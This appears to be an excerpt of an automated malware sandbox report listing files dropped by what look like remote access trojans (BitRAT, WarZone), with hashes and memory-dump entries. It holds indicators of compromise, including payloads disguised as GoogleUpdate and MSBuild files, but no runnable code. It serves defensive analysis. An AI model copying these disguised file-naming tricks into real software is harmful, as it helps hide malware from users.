| MD5 | eb51a99599683b7b3d47981722da5218 |
| SHA1 | e693b669e2c309869ce31f13661ba6eb3d3b0566 |
| SHA256 | 9415d70f7cf9138449eb2680aef2566dce26dbd20431ab80bba6870fe208eb38 |
| SHA512 | 6cf57bad994790e5b0f2791f6fdfcfff973dcecce284b330070f6e32f67114e89ce8fb893b19193765dfb073fe303b46dff5a83208b72d2b5840a74c7a326aba |
memory/4432-163-0x0000000000FB0000-0x0000000001032000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\$77icaro.exe
| MD5 | eb51a99599683b7b3d47981722da5218 |
| SHA1 | e693b669e2c309869ce31f13661ba6eb3d3b0566 |
| SHA256 | 9415d70f7cf9138449eb2680aef2566dce26dbd20431ab80bba6870fe208eb38 |
| SHA512 | 6cf57bad994790e5b0f2791f6fdfcfff973dcecce284b330070f6e32f67114e89ce8fb893b19193765dfb073fe303b46dff5a83208b72d2b5840a74c7a326aba |
memory/3772-159-0x0000000000400000-0x00000000007CE000-memory.dmp
memory/3980-164-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe
| MD5 | ca607a7fb0fa99f0ef20300deea83d55 |
| SHA1 | f6348167625781bb441dfcbb49f8e65c62144adf |
| SHA256 | 612f6d773bd702be0c4fd4ee953da740c98d51f5c1838e92acef61d9cde8cf36 |
| SHA512 | ef4b603b19e196100f07073011970a415c77266c4e4f9e414e967a4c4ef0987e8c718f4d1cf5642496d3ee1aedba6045606e48bb6aad4266bbbed63fe5cf63f6 |
C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe
| MD5 | 48092158c6601dba353421f70d501025 |
| SHA1 | 01d0d5149e9b690a84554fb4ac72fdbdad6d56d2 |
| SHA256 | 9750babc3722fe3f50c953a34c6c06f4483321e5e325e61c1c0a434200a03405 |
| SHA512 | b2b002ce5d0464a0e765b039f486f81b9ef1ddce3f809d91f9430554b1430bd775bebc1c5a4f60951313ff8ed97bd3de05df3478ecbb907b308c7ca38fe65434 |
\??\c:\Users\Admin\AppData\Local\Temp\n42f4axy\n42f4axy.0.cs
| MD5 | b3a0e87506914a518a26de26cc397a0b |
| SHA1 | 822bf87c58c6a2dcc72689be4a1c9869f4ffabb3 |
| SHA256 | 5118a52b8622770613d8a22dd735d96fcbd76021d12ee9c36b1a78dfa9a5f110 |
| SHA512 | 77077e2e75bee91679c6c71ce8ac82810e9a55c8f5dd01adbc728372cddfc385de664ac51463f7b9fa37a209a685e0b7d719178b90b68ff852e4598510df879c |
memory/4432-166-0x00007FFF3BA70000-0x00007FFF3C531000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\n42f4axy\n42f4axy.cmdline
| MD5 | f4e02ad531227dfde2db9e6da710c2a2 |
| SHA1 | 5d4e598721c989be975022060a01eef1992da72d |
| SHA256 | 6c4827996d73b0188f15ce978098ec336daab436babc02fcf1c1ff284fbe25a7 |
| SHA512 | 2ee6a97c948b631919a7ea65641755563b5aea426d574f166c8e1e1d7e9b07e706f9bb9898749afd8f8b9f4fbc9d100fb690ebdc6f54bcbf1511ba5747138440 |
C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe
| MD5 | f8169767c726f1be7a7e14839cc44d36 |
| SHA1 | 571bcdb58a2017d77593ea1325bac737160b81f4 |
| SHA256 | 1940d88ba94da500a695bc7d3d42a275ec9a7ff700f90d6174991824d71a9377 |
| SHA512 | c1469da2f34315f6cac4a67bb7a8f0ef7846103289f953a47222c8a240279027def56a6fece4ceea78d0b0dfb4f0875f50eca42f5d2ec3e49e1b10bdc84b7a05 |
memory/4524-168-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\CSC7FCCC60AE1614FD7B713EA441ED24B43.TMP
| MD5 | 8bbf0aca651a891e81c9323a8af372ee |
| SHA1 | c6ff718e14da6eb73d2733b41c0a95df9a23fc45 |
| SHA256 | 9e6805b532ceb4ee0108f8616675400798da72a930d70a28c8f12529eacea0c2 |
| SHA512 | e9c6bfb01f3d68dbd96e31b7f18d78ea574b7e6c622809a2be0459c4f6b9a4abc204ddc4b6f7526dfdfc872ff543beaa3ceeb89c8f7c7b968c6320740bdfdebb |
C:\Users\Admin\AppData\Local\Temp\RESECD6.tmp
| MD5 | bdb285fbac36bb8dbf9bae08e3ca29f9 |
| SHA1 | e9f9876f8e153eebef538ec82f62ed1cad2828c6 |
| SHA256 | bf18a49ec16c2340aa77dde24e050173bb15854c4dc04fa3fc2ce7ee3a30ed1a |
| SHA512 | e56e0e1a23915a7e4f87b61f143bd66bc479078b7505bed9e8e25f27a3872c9ff6e7defd5ec9902f243194214c205c9a606b0f263c29066534efb90bf151b052 |
memory/572-171-0x0000000000000000-mapping.dmp
memory/4260-173-0x000000000041F7B2-mapping.dmp
memory/4924-174-0x0000000006D60000-0x0000000006D92000-memory.dmp
memory/4852-175-0x0000000000000000-mapping.dmp
memory/4924-176-0x000000006FDE0000-0x000000006FE2C000-memory.dmp
memory/4924-177-0x0000000006D40000-0x0000000006D5E000-memory.dmp
memory/4260-172-0x0000000000400000-0x0000000000424000-memory.dmp
memory/4260-178-0x0000000004E30000-0x0000000004EC2000-memory.dmp
memory/4260-179-0x0000000005020000-0x00000000050BC000-memory.dmp
memory/4924-180-0x00000000080F0000-0x000000000876A000-memory.dmp
memory/4924-181-0x0000000007AB0000-0x0000000007ACA000-memory.dmp
memory/4432-184-0x00007FFF3BA70000-0x00007FFF3C531000-memory.dmp
C:\ProgramData\$77images.exe
| MD5 | 48092158c6601dba353421f70d501025 |
| SHA1 | 01d0d5149e9b690a84554fb4ac72fdbdad6d56d2 |
| SHA256 | 9750babc3722fe3f50c953a34c6c06f4483321e5e325e61c1c0a434200a03405 |
| SHA512 | b2b002ce5d0464a0e765b039f486f81b9ef1ddce3f809d91f9430554b1430bd775bebc1c5a4f60951313ff8ed97bd3de05df3478ecbb907b308c7ca38fe65434 |
C:\ProgramData\$77images.exe
| MD5 | 48092158c6601dba353421f70d501025 |
| SHA1 | 01d0d5149e9b690a84554fb4ac72fdbdad6d56d2 |
| SHA256 | 9750babc3722fe3f50c953a34c6c06f4483321e5e325e61c1c0a434200a03405 |
| SHA512 | b2b002ce5d0464a0e765b039f486f81b9ef1ddce3f809d91f9430554b1430bd775bebc1c5a4f60951313ff8ed97bd3de05df3478ecbb907b308c7ca38fe65434 |
memory/4924-188-0x0000000007B20000-0x0000000007B2A000-memory.dmp
memory/3772-189-0x000000006FEE0000-0x000000006FF19000-memory.dmp
memory/3560-185-0x0000000000000000-mapping.dmp
memory/3772-190-0x000000006F810000-0x000000006F849000-memory.dmp
memory/3160-191-0x0000000000000000-mapping.dmp
memory/2848-183-0x0000000000000000-mapping.dmp
memory/2264-182-0x0000000000000000-mapping.dmp
memory/2436-192-0x0000000000000000-mapping.dmp
memory/4924-193-0x0000000007D30000-0x0000000007DC6000-memory.dmp
memory/3860-195-0x000000006FDE0000-0x000000006FE2C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe
| MD5 | 1644f12dc1fdf3e3505fd85cc7ee2bfb |
| SHA1 | 5e5682d54ddda2f66b0bdbaf60dc90e3209cd132 |
| SHA256 | a831b9f4d11bb5624c7087006a0e8097774a3ccbe3afd812d0082b8e8eaa4cf7 |
| SHA512 | 1177b7f628238a5db0e9190abd0bc2295bb147212dfe3d1899f800c88245260a0318e5b471c00466ec1ce71b2d311411d26f0212101a12be3253d3e4c22847be |
C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe
| MD5 | 1644f12dc1fdf3e3505fd85cc7ee2bfb |
| SHA1 | 5e5682d54ddda2f66b0bdbaf60dc90e3209cd132 |
| SHA256 | a831b9f4d11bb5624c7087006a0e8097774a3ccbe3afd812d0082b8e8eaa4cf7 |
| SHA512 | 1177b7f628238a5db0e9190abd0bc2295bb147212dfe3d1899f800c88245260a0318e5b471c00466ec1ce71b2d311411d26f0212101a12be3253d3e4c22847be |
memory/4668-198-0x0000000000C20000-0x0000000000C28000-memory.dmp
memory/4668-194-0x0000000000000000-mapping.dmp
memory/4668-199-0x00007FFF3B2D0000-0x00007FFF3BD91000-memory.dmp
memory/3172-200-0x0000000000000000-mapping.dmp
memory/1436-201-0x0000000000000000-mapping.dmp
memory/4152-202-0x0000000000000000-mapping.dmp
memory/4444-204-0x0000000000000000-mapping.dmp
memory/1472-203-0x0000000000000000-mapping.dmp
memory/4924-205-0x0000000007CE0000-0x0000000007CEE000-memory.dmp
memory/3772-206-0x000000006EA90000-0x000000006EAC9000-memory.dmp
memory/4924-207-0x0000000007DF0000-0x0000000007E0A000-memory.dmp
memory/1472-208-0x0000000000910000-0x0000000000911000-memory.dmp
memory/4924-209-0x0000000007DD0000-0x0000000007DD8000-memory.dmp
memory/2264-210-0x000000006FDE0000-0x000000006FE2C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | 124edf3ad57549a6e475f3bc4e6cfe51 |
| SHA1 | 80f5187eeebb4a304e9caa0ce66fcd78c113d634 |
| SHA256 | 638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675 |
| SHA512 | b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee |
memory/1436-218-0x000000006FDE0000-0x000000006FE2C000-memory.dmp
memory/4668-220-0x00007FFF3B2D0000-0x00007FFF3BD91000-memory.dmp
memory/1124-221-0x0000021DDF910000-0x0000021DDF930000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 33b19d75aa77114216dbc23f43b195e3 |
| SHA1 | 36a6c3975e619e0c5232aa4f5b7dc1fec9525535 |
| SHA256 | b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2 |
| SHA512 | 676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 39c9199f60a330471595859d6cdc0a6d |
| SHA1 | eb9c797cb6f892c0a77b91ff6a6337f2ce958c24 |
| SHA256 | bae534da4c46d8a9137cd8aadddf9ce6a297edc7f7e05fe9cee777a4b6221411 |
| SHA512 | 421ab0885d1b59e5705fc47912a90c546b01d7d5b5ab0b53195d5d854174e48524a73488ae80651d0b2350837f21a4070792dc1b6e4553beffa6203a931ace14 |
memory/4924-228-0x0000000007E40000-0x0000000007E62000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 70f94f425bc3f24106790d4c7d46b792 |
| SHA1 | e86ac9ab83476e200dc92c3be9d7b9a6792bce9b |
| SHA256 | 9bae3230b64b785583cc1dea8dd37e27fafa9c049d51192c2e7e02cbd417488c |
| SHA512 | a0203cfc02e2a2bb9003b7f1be5e92c72d5dada4867f2209d311270541a78b0f2653e15a692ceb235d5d2846a3d5452c4dcb0e77ac7dafcc0ad1b6da3a9259ee |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6347b5bfbd2371b20a3c0452e4030638 |
| SHA1 | ada85fe3166c6d12a8cf4358d944637aeeaad4ee |
| SHA256 | 02250982f5f910704a7c1bea8cf81bda3194dfa8aefccba1c650a72288e64ec4 |
| SHA512 | b98b4b6e9e2e0848a09b7b24ecd9fb58febcb52d04ba62eccac4ad645466c5aa550b4691b2db8fb2749d7887f30ec5a35fc64c94172f6fb896fc55ca0e86368a |
memory/1124-231-0x0000021DE200C000-0x0000021DE2010000-memory.dmp
memory/1124-232-0x0000021DE200C000-0x0000021DE2010000-memory.dmp
memory/1124-233-0x0000021DE200C000-0x0000021DE2010000-memory.dmp
memory/1124-234-0x0000021DE200C000-0x0000021DE2010000-memory.dmp
memory/1124-235-0x0000021DE200C000-0x0000021DE2010000-memory.dmp
memory/1124-237-0x0000021DDEB50000-0x0000021DDEC50000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cd207fca512b968e839518ad19ec724c |
| SHA1 | 4b8ce07ccbaf935f8c6378ef49bef65158cd99ec |
| SHA256 | 80cf8c8c54d4c4625614e3db5d9a0c66cacd15565aba698aec303ca7e1c0405d |
| SHA512 | 271af571ae4dd0a090213d38538bfd2749248395a99ed8a1ec598a488cda27988d2e84e2ab7514e3a905957e36cdad69d9a7f27e15864abb7a4cc98b21f28ba3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4b2ed10cbd2d58dbbf3c50a155c3e34d |
| SHA1 | aabe7337b4253830afdf97f24a71773c7c236c6e |
| SHA256 | 5cb15d10fcd38f7f09e0a496169f451bf403d356cff9ac026a22691134ce8d4a |
| SHA512 | bd99e9dc58099d290cf7b4ed9a54038e254087459ec302b85a9dac517c10670cc383952284210c20ef4daa182bc4d8a85fcb86cd744df5e85657f120a3bb589a |
memory/3772-240-0x000000006E8D0000-0x000000006E909000-memory.dmp
memory/4092-241-0x00007FFF3B2D0000-0x00007FFF3BD91000-memory.dmp
memory/4092-242-0x0000017BC64C0000-0x0000017BC64E2000-memory.dmp
memory/3772-243-0x0000000070210000-0x0000000070249000-memory.dmp
memory/4092-244-0x00007FFF3B2D0000-0x00007FFF3BD91000-memory.dmp
memory/3772-245-0x0000000070210000-0x0000000070249000-memory.dmp
memory/4092-246-0x00007FFF5A5D0000-0x00007FFF5A7C5000-memory.dmp
memory/4092-247-0x00007FFF5A4D0000-0x00007FFF5A58E000-memory.dmp
memory/2504-249-0x0000000140002300-mapping.dmp
memory/2504-248-0x0000000140000000-0x000000014002B000-memory.dmp
memory/2504-251-0x0000000140000000-0x000000014002B000-memory.dmp
memory/2504-252-0x00007FFF5A5D0000-0x00007FFF5A7C5000-memory.dmp
memory/2504-253-0x00007FFF5A4D0000-0x00007FFF5A58E000-memory.dmp
memory/408-255-0x00007FFF1A650000-0x00007FFF1A660000-memory.dmp
memory/620-254-0x00007FFF1A650000-0x00007FFF1A660000-memory.dmp